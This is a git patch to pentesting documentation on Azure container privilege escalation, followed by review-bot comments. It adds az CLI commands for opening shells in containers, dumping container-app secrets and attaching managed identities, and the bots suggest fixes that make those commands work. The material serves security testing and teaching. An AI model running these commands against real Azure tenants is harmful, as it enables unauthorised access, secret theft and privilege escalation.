From 9cd2ef8e2f597cec30923172457b79b813cbcd34 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Sat, 15 Feb 2025 18:48:56 +0100 Subject: [PATCH] fixes --- src/SUMMARY.md | 4 +- ...z-container-instances-apps-jobs-privesc.md | 67 +++++++++++++++++-- .../az-container-instances-apps-jobs.md | 19 ++++-- 3 files changed, 78 insertions(+), 12 deletions(-) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 3cd74bd86..b6391b16a 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -415,7 +415,7 @@ - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md) - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md) - - [Az - Container Instances](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md) + - [Az - Container Instances, Apps & Jobs](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md) - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md) - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) 
@@ -470,7 +470,7 @@ - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md) - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md) - - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md) + - [Az - Container Instances, Apps & Jobs Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md) - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md) - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md index 8f554c7c6..db1478e3f 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md @@ -1,8 +1,8 @@ -# Az - Azure Container Instances Privesc +# Az - Azure Container Instances, Apps & Jobs Privesc {{#include ../../../banners/hacktricks-training.md}} -## Azure Container Instances +## Azure Container Instances, Apps & Jobs Fore more information check: 
@@ -10,14 +10,16 @@ Fore more information check: ../az-services/az-container-instances-apps-jobs.md {{#endref}} +## ACI + ### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action` These permissions allow the user to **execute a command** in a running container. This can be used to **escalate privileges** in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container. -To execute a `ls` and get the output is as simple as: +To get a shell is as simple as: ```bash -az container exec --name --resource-group --exec-command 'ls' +az container exec --name --resource-group --exec-command '/bin/sh' ``` It's also possible to **read the output** of the container with: 
@@ -71,6 +73,63 @@ az container create \ Moreover, it's also possible to update an existing container group adding for example the **`--command-line` argument** with a reverse shell. + +## ACA + +### `Microsoft.App/containerApps/read`, `Microsoft.App/managedEnvironments/read`, `microsoft.app/containerapps/revisions/replicas`, `Microsoft.App/containerApps/revisions/read`, `Microsoft.App/containerApps/getAuthToken/action` + +These permissions allow the user to **get a shell** in a runningapplication container. This can be used to **escalate privileges** in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container. + +```bash +az containerapp exec --name --resource-group --command "sh" +az containerapp debug --name --resource-group + +``` + +### `Microsoft.App/containerApps/listSecrets/action` + +This permission allows to get the **clear text of the secrets** configured inside a container app. Note that secrets can be configured with the clear text of with a link to a key vault (in such case the app will have assigned a managed identity with access over the secrets). + +```bash +az containerapp secret list --name --resource-group +az containerapp secret show --name --resource-group --secret-name +``` + +### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +These permissions allows to **attach a user managed identity** to a container app. This is very useful to escalate privileges in the container. Executing this action from the az cli also requires the permission `Microsoft.App/containerApps/listSecrets/action`. 
+ +To attach a user managed identity to a container group: + +```bash +az containerapp identity assign -n -g --user-assigned myUserIdentityName +``` + +### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action` + +These permission allows to **create or update an application container** with a **user managed identity** attached to it. This is very useful to escalate privileges in the container. + +```bash +# Get environments +az containerapp env list --resource-group Resource_Group_1 + +# Create app in a an environment +az containerapp create \ + --name \ + --resource-group \ + --image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \ + --cpu 1 --memory 1.0 \ + --user-assigned \ + --min-replicas 1 \ + --command "" +``` + +> [!TIP] +> Note that with these permisions **other configurations of the app** can be modified which could allow to perform other privesc and post explaoitation attacks depending on the configuration of existing apps. + + +## Jobs + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md index ef2755ebe..4dfd453ab 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md +++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md 
@@ -14,16 +14,20 @@ Differences: ### Configurations -Special options for ACI: -- Regarding networking it can also have a **public IP** or be **private endpoints**. +Special options for **ACI**: +- Regarding networking it's possible to select one of these 3 options: + - **Public** (default) + - **Private** (only accessible from the VNet) + - **None** (no network access) -Special options for ACA: +Special options for **ACA**: - It's possible to **restrict the trafic** to the container to the container app environment or leave it public. - It’s possible to use an **external identity provider** (Microsoft, Facebook, Google, and Twitter) for authentication - It's possible to **store App secrets** (in clear text the app or as links to a vault assigning a MI with access over it) - It’s possible to have **revisions and replicas of the app** +- It's possible to deploy from a specific **source code or artifact** instead of using a container. For the source code, access to Gihub must be given. For artifacts, it's possible to upload it after creating the app. -Special options for jobs: +Special options for **jobs**: - The trigger type can be **manual, scheduled or event-based** (like a message arriving in a queue). Common options: @@ -56,10 +60,10 @@ az container show --name --resource-group az container logs --name --resource-group ## Execute a command in a running container and get the output -az container exec --name --resource-group --exec-command "ls" +az container exec --name --resource-group --exec-command "/bin/sh" # Get a shell ## Get yaml configuration of the container group -az container export --name --resource-group +az container export --name --resource-group --file # ACA ## List all container apps in the subscription 
@@ -68,6 +72,9 @@ az containerapp list ## Show detailed information about a specific container app az containerapp show --name --resource-group +## List app environments +az containerapp env list --resource-group + ## Fetch logs from a container app az containerapp logs show --name --resource-group
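Review bot: the unchanged context line `Fore more information check:` in hunk `@@ -1,8 +1,8 @@` of az-container-instances-apps-jobs-privesc.md still carries the typo (`Fore` for `For`); since this hunk already touches the headings around it, fix it here rather than leaving it for a later commit.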
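Review bot: in hunk `@@ -10,14 +10,16 @@` of the privesc page, `az container exec --name --resource-group --exec-command '/bin/sh'` fails against any container group that has more than one container, because `az container exec` then requires `--container-name`; show `--container-name <container>` alongside the new shell line, since the permission set in the heading applies equally to multi-container groups. The unchanged sentence above it also still reads `sentitive information storeed` and could be fixed in the same pass.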
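Review bot: the `az containerapp create` example added in hunk `@@ -71,6 +73,63 @@` of the privesc page never passes `--environment`, although the command requires one and the `Microsoft.App/managedEnvironments/join/action` permission named in that section's heading exists precisely for joining the app to an environment; the `# Get environments` / `az containerapp env list` step above it only makes sense if its result is then consumed, so add `--environment <env-name>` to the create call, give `--user-assigned` the identity name or resource ID it expects (as the `az containerapp identity assign` example a few lines up does), and drop the empty `--command ""`. Secondary points in the same hunk: the permission `microsoft.app/containerapps/revisions/replicas` is lower-cased and has no action suffix unlike every other entry in the list, so it is probably meant to be `Microsoft.App/containerApps/revisions/replicas/read`; `To attach a user managed identity to a container group:` sits under the ACA section and should say container app; `## Jobs` is added with no body directly before the banner include, so either fill it or leave it out until there is content; and the new prose has several typos (`runningapplication`, `sentitive information storeed`, `with the clear text of with a link`, `These permission allows`, `in a an environment`, `permisions`, `explaoitation`).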
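Review bot: `Gihub` in the new source-code bullet of hunk `@@ -14,16 +14,20 @@` of az-container-instances-apps-jobs.md should be `GitHub`; the unchanged ACA bullets in the same hunk also still read `restrict the trafic` and `in clear text the app` (presumably `in clear text in the app`), and since the hunk already rewrites the surrounding bullets these are cheap to fix together.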
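Review bot: the comment above the changed line in hunk `@@ -56,10 +60,10 @@` of the services page still says `## Execute a command in a running container and get the output`, but the line beneath it now opens an interactive `/bin/sh`, so the comment is stale; either update it or keep the original `ls` form and add the shell as a second line. As with the privesc page, `az container exec` needs `--container-name` when the group has more than one container. Adding `--file` to `az container export` is correct, as the parameter is required for that command.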
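Review bot: `az containerapp env list --resource-group` in hunk `@@ -68,6 +72,9 @@` can also be run without `--resource-group`, which enumerates environments across the whole subscription and matches the `az containerapp list` line just above it that already does so; showing both forms would make the enumeration list consistent.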